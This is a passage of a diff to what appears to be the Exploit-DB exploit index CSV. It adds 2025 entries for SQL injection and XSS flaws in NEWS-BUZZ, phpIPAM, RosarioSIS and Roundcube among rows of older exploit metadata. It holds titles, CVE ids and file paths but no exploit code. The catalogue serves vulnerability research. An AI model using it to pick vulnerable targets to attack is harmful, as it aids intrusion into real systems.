Scripting (XSS)",2025-04-11,CodeSecLab,webapps,php,,2025-04-11,2025-04-11,0,CVE-2018-1000638,,,,, 49193,exploits/php/webapps/49193.txt,"MiniCMS 1.10 - 'content box' Stored XSS",2020-12-04,yudp,webapps,php,,2020-12-04,2020-12-04,0,,,,,, 44362,exploits/php/webapps/44362.html,"MiniCMS 1.10 - Cross-Site Request Forgery",2018-03-30,zixian,webapps,php,80,2018-03-30,2018-03-30,0,CVE-2018-9092,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comMiniCMS-1.10.tar.gz, 2796,exploits/php/webapps/2796.php,"miniCWB 1.0.0 - 'contact.php' Local File Inclusion",2006-11-17,Kacper,webapps,php,,2006-11-16,,1,,,,,, @@ -24640,6 +24661,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 44030,exploits/php/webapps/44030.txt,"News Website Script 2.0.4 - 'search' SQL Injection",2018-02-13,"Varun Bagaria",webapps,php,,2018-02-13,2018-02-13,0,,,,,, 46456,exploits/php/webapps/46456.txt,"News Website Script 2.0.5 - SQL Injection",2019-02-25,"Mr Winst0n",webapps,php,,2019-02-25,2019-02-25,0,,,,,, 23012,exploits/php/webapps/23012.txt,"News Wizard 2.0 - Full Path Disclosure",2003-08-11,G00db0y,webapps,php,,2003-08-11,2012-11-29,1,,,,,,https://www.securityfocus.com/bid/8389/info +52174,exploits/php/webapps/52174.txt,"NEWS-BUZZ News Management System 1.0 - SQL Injection",2025-04-11,egsec,webapps,php,,2025-04-11,2025-04-11,0,CVE-2024-10758,,,,, 3406,exploits/php/webapps/3406.pl,"News-Letterman 1.1 - 'eintrag.php?sqllog' Remote File Inclusion",2007-03-04,bd0rk,webapps,php,,2007-03-03,2016-09-27,1,OSVDB-35355;CVE-2007-1340,,,,http://www.exploit-db.comletterman1.1.zip, 31447,exploits/php/webapps/31447.txt,"News-Template 0.5beta - 'print.php' Multiple Cross-Site Scripting Vulnerabilities",2008-03-20,ZoRLu,webapps,php,,2008-03-20,2014-02-06,1,,,,,,https://www.securityfocus.com/bid/28353/info 26458,exploits/php/webapps/26458.txt,"News2Net 3.0 - 'index.php' SQL Injection",2005-11-02,Mousehack,webapps,php,,2005-11-02,2013-06-26,1,CVE-2005-3469;OSVDB-20450,,,,,https://www.securityfocus.com/bid/15274/info @@ -27319,6 +27341,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 47438,exploits/php/webapps/47438.py,"phpIPAM 1.4 - SQL Injection",2019-09-30,"Kevin Kirsche",webapps,php,80,2019-09-30,2019-09-30,0,CVE-2019-16692,"SQL Injection (SQLi)",,,http://www.exploit-db.comphpipam-1.4.tar.gz, 50684,exploits/php/webapps/50684.py,"PHPIPAM 1.4.4 - SQLi (Authenticated)",2022-01-25,"Rodolfo Tavares",webapps,php,,2022-01-25,2022-01-25,0,CVE-2022-23046,,,,, 50963,exploits/php/webapps/50963.py,"phpIPAM 1.4.5 - Remote Code Execution (RCE) (Authenticated)",2022-06-14,"Guilherme Alves",webapps,php,,2022-06-14,2022-06-14,0,,,,,, +52176,exploits/php/webapps/52176.txt,"phpIPAM 1.6 - Reflected Cross Site Scripting (XSS)",2025-04-11,CodeSecLab,webapps,php,,2025-04-11,2025-04-11,0,CVE-2023-24657,,,,, 20278,exploits/php/webapps/20278.txt,"phpix 1.0 - Directory Traversal",2000-10-07,Synnergy.net,webapps,php,,2000-10-07,2012-08-06,1,CVE-2000-0919;OSVDB-472,,,,,https://www.securityfocus.com/bid/1773/info 23558,exploits/php/webapps/23558.txt,"PHPix 2.0.3 - Arbitrary Command Execution",2004-01-20,"Max Stepanov",webapps,php,,2004-01-20,2012-12-20,1,OSVDB-3745,,,,,https://www.securityfocus.com/bid/9458/info 48138,exploits/php/webapps/48138.txt,"PhpIX 2012 Professional - 'id' SQL Injection",2020-02-26,indoushka,webapps,php,,2020-02-26,2020-02-26,0,,,,,, @@ -29159,6 +29182,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 8198,exploits/php/webapps/8198.pl,"RoomPHPlanning 1.6 - 'userform.php' Create Admin User",2009-03-10,"Jonathan Salwan",webapps,php,,2009-03-09,2016-12-02,1,,,,,http://www.exploit-db.comrp_1.6.zip, 8797,exploits/php/webapps/8797.txt,"roomphplanning 1.6 - Multiple Vulnerabilities",2009-05-26,"ThE g0bL!N",webapps,php,,2009-05-25,2016-12-02,1,OSVDB-62791;CVE-2009-4671;OSVDB-54772;CVE-2009-4670;OSVDB-54771;CVE-2009-4669;OSVDB-54770;OSVDB-54769,,,,http://www.exploit-db.comrp_1.6.zip, 51622,exploits/php/webapps/51622.txt,"RosarioSIS 10.8.4 - CSV Injection",2023-07-28,"Ranjeet Jaiswal",webapps,php,,2023-07-28,2023-07-31,1,CVE-2023-29918,,,,, +52169,exploits/php/webapps/52169.txt,"RosarioSIS 7.6 - SQL Injection",2025-04-11,CodeSecLab,webapps,php,,2025-04-11,2025-04-11,0,CVE-2021-44567,,,,, 10793,exploits/php/webapps/10793.txt,"RoseOnlineCMS 3 B1 - 'admin' Local File Inclusion",2009-12-30,cr4wl3r,webapps,php,,2009-12-29,,1,OSVDB-61563;CVE-2009-4581,,,,, 11158,exploits/php/webapps/11158.txt,"RoseOnlineCMS 3 B1 - Remote Authentication Bypass",2010-01-16,cr4wl3r,webapps,php,,2010-01-15,,1,,,,,http://www.exploit-db.comRoseOnlineCMS_v3_b1.rar, 3548,exploits/php/webapps/3548.pl,"RoseOnlineCMS 3 beta2 - 'op' Local File Inclusion",2007-03-23,GoLd_M,webapps,php,,2007-03-22,2016-09-30,1,OSVDB-38601;CVE-2007-1636,,,,http://www.exploit-db.comRoseOnlineCMS_v3_B1.rar, @@ -29177,6 +29201,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 20549,exploits/php/webapps/20549.py,"Roundcube Webmail 0.8.0 - Persistent Cross-Site Scripting",2012-08-16,"Shai rod",webapps,php,,2012-08-16,2012-08-16,1,CVE-2012-4668;CVE-2012-3508;OSVDB-85142;OSVDB-84741,,,,http://www.exploit-db.comroundcubemail-0.8.0.tar.gz, 39245,exploits/php/webapps/39245.txt,"Roundcube Webmail 1.1.3 - Directory Traversal",2016-01-15,"High-Tech Bridge SA",webapps,php,80,2016-01-15,2016-12-28,0,CVE-2015-8770;OSVDB-132194,,,,http://www.exploit-db.comroundcubemail-1.1.3-complete.tar.gz,https://www.htbridge.com/advisory/HTB23283 49510,exploits/php/webapps/49510.py,"Roundcube Webmail 1.2 - File Disclosure",2021-02-01,stonepresto,webapps,php,,2021-02-01,2021-02-01,0,,,,,, +52173,exploits/php/webapps/52173.txt,"Roundcube Webmail 1.6.6 - Stored Cross Site Scripting (XSS)",2025-04-11,AmirZargham,webapps,php,,2025-04-11,2025-04-11,0,CVE-2024-37383,,,,, 39963,exploits/php/webapps/39963.txt,"Roxy Fileman 1.4.4 - Arbitrary File Upload",2016-06-16,"Tyrell Sassen",webapps,php,80,2016-06-16,2016-06-16,0,,,,,http://www.exploit-db.comRoxyFileman-1.4.4-php.zip, 46172,exploits/php/webapps/46172.txt,"Roxy Fileman 1.4.5 - Arbitrary File Download",2019-01-16,"Ihsan Sencan",webapps,php,80,2019-01-16,2019-01-16,0,,,,,http://www.exploit-db.comRoxyFileman-1.4.5-php.zip, 46085,exploits/php/webapps/46085.txt,"Roxy Fileman 1.4.5 - Unrestricted File Upload / Directory Traversal",2019-01-07,"Pongtorn Angsuchotmetee_ Vittawat Masaree",webapps,php,80,2019-01-07,2019-01-07,0,CVE-2018-20526;CVE-2018-20525,Traversal,,,http://www.exploit-db.comRoxyFileman-1.4.5-php.zip,